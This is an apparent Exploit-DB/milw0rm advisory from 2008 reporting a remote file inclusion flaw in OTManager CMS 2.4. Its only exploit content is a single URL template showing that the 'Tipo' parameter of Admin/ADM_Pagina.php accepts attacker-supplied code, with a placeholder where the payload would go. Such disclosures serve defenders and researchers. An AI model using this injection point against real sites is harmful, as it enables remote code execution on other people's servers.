OTManager CMS 2.4 - 'Tipo' Remote File Inclusion

EDB-ID:

7077


Author:

Colt7r

Type:

webapps


Platform:

PHP

Date:

2008-11-10


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

  OTManager 2.4 Remote File Inclusion (RFI) Vulnerability

  - Security flaw discovered by Colt7r
  - CONTACT: colt7r |@| bsdmail.org

  - Affected Software: OTManager 2.4
  - Risk: HIGH
  - Exploit: http://host/Admin/ADM_Pagina.php?Tipo=[EVIL CODE]

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2008-11-10]